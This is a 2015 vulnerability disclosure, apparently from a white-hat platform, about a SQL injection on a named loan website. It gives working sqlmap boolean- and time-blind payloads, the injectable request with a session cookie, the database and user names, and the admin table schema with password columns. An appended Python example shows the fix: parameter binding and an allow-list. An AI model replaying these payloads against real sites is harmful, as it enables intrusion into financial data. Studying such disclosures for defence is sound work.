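2015-07-22: Details reported to the vendor; awaiting vendor response
2015-07-22: Vendor confirmed; details disclosed to the vendor only
2015-08-01: Details disclosed to core white hats and experts in the relevant field
2015-08-11: Details disclosed to regular white hats
2015-08-21: Details disclosed to intern white hats
2015-09-05: Details disclosed to the public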
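Fortunately it is a boolean-based blind injection, so it runs at a decent speed. The tables contain all sorts of admin and amount data.
Injection point: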
GET /list/index/city/beijing*/xd_type/gouche/money/10/month/12.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://open.haodai.com:80/
Cookie: PHPSESSID=gc4u5iaklethl5v2c7ap443562; city=beijing; LANDING_PAGE=http%3A%2F%2Fopen.haodai.com%2F; desktop=0; REFERER=open.haodai.com; SOURCE_URL=http%3A%2F%2Fopen.haodai.com%2F
Host: open.haodai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://open.haodai.com:80/list/index/city/beijing') AND 2827=2827 AND ('IkuO'='IkuO/xd_type/gouche/money/10/month/12.html

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://open.haodai.com:80/list/index/city/beijing') AND (SELECT * FROM (SELECT(SLEEP(5)))WiVp) AND ('uRUa'='uRUa/xd_type/gouche/money/10/month/12.html
---
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] hd
[*] information_schema
user:
back-end DBMS: MySQL 5.0.12
current user: '[email protected].%'
admin table:
back-end DBMS: MySQL 5.0.12
Database: hd
Table: admin
[24 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| agent_num    | char(12)              |
| agent_passwd | varchar(16)           |
| agent_phone  | varchar(16)           |
| auth         | varchar(1024)         |
| citys        | text                  |
| citys_iued   | text                  |
| email        | varchar(255)          |
| id           | int(10) unsigned      |
| isreadtj     | tinyint(1) unsigned   |
| iutypes      | text                  |
| menuid       | smallint(5) unsigned  |
| name         | varchar(32)           |
| pwd          | char(60)              |
| pwd_key      | varchar(32)           |
| qq           | char(11)              |
| relation     | int(10) unsigned      |
| role         | varchar(10)           |
| stat         | tinyint(3) unsigned   |
| tel          | char(11)              |
| tquin        | int(11) unsigned      |
| type         | tinyint(3) unsigned   |
| weixin       | char(32)              |
| xdtypes      | text                  |
| zone_id      | mediumint(8) unsigned |
+--------------+-----------------------+
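It is too late at night, so I will not dump the specific sensitive data; this is a financial site, after all.
You are the experts on this.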
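The boolean-based payload recorded above shows the `city` path segment landing inside a quoted, parenthesised SQL literal. The following is an added example, not part of the original report or the vendor's code, that contrasts a string-built query with a bound parameter plus allow-list validation. The table, its rows, the function names, the allow-list pattern and the use of Python with SQLite in place of the site's MySQL backend are all assumptions.

```python
import re
import sqlite3

# Request path as recorded in the report (boolean-based blind payload in the city segment).
PAYLOAD_PATH = ("/list/index/city/beijing') AND 2827=2827 AND ('IkuO'='IkuO"
                "/xd_type/gouche/money/10/month/12.html")
CLEAN_PATH = "/list/index/city/beijing/xd_type/gouche/money/10/month/12.html"
CITY_RE = re.compile(r"[a-z]{1,32}")  # assumed allow-list: lowercase city slugs only


def make_db():
    """Constructed stand-in table; schema and rows are assumptions, not the site's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE loans (city TEXT, xd_type TEXT, name TEXT)")
    db.executemany("INSERT INTO loans VALUES (?, ?, ?)",
                   [("beijing", "gouche", "car loan A"),
                    ("shanghai", "gouche", "car loan B")])
    return db


def parse_path(path):
    """Split /list/index/k1/v1/k2/v2.html into {k1: v1, k2: v2}."""
    parts = path.rsplit(".html", 1)[0].strip("/").split("/")[2:]
    return dict(zip(parts[0::2], parts[1::2]))


def list_vulnerable(db, params):
    # The path value is pasted into the SQL text, so its quote and parenthesis
    # end the literal and the remainder is parsed as part of the WHERE clause.
    sql = "SELECT name FROM loans WHERE (city = '%s')" % params["city"]
    return db.execute(sql).fetchall()


def list_hardened(db, params, validate=True):
    city = params.get("city", "")
    if validate and not CITY_RE.fullmatch(city):
        raise ValueError("city rejected by allow-list")
    # Bound parameter: the driver passes the value as data, never as SQL text.
    return db.execute("SELECT name FROM loans WHERE (city = ?)", (city,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(list_vulnerable(db, parse_path(PAYLOAD_PATH)))       # injected condition is evaluated
    print(list_hardened(db, parse_path(PAYLOAD_PATH), False))  # payload compared as a literal
    print(list_hardened(db, parse_path(CLEAN_PATH)))           # normal request still works
```

Binding alone already neutralises the recorded payload; the allow-list rejects the request before it reaches the database and gives a clean point for logging.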
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-07-22 10:38
Thanks.
None yet.